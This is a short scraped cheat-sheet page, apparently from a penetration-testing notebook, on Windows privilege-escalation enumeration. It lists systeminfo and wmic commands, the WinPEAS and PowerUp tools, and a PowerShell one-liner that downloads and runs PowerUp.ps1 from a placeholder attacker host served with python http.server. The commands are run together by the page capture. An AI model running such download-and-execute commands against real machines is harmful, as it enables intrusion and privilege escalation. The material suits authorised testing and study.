Enumeration
Manual Enumeration
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"wmic os get servicepackmajorversionAutomatic Enumeration
WinPEAS
PowerUp
Last updated
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"wmic os get servicepackmajorversionLast updated
iconv -f utf-16le -t utf-8 winpeas.txt -o winpeas-utf-8.txtless -R winpeas-utf-8.txtpython3 -m http.server 80IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP_ADDRESS_HERE/PowerUp.ps1');Invoke-AllChecks | Out-File -Encoding ASCII powerup.txt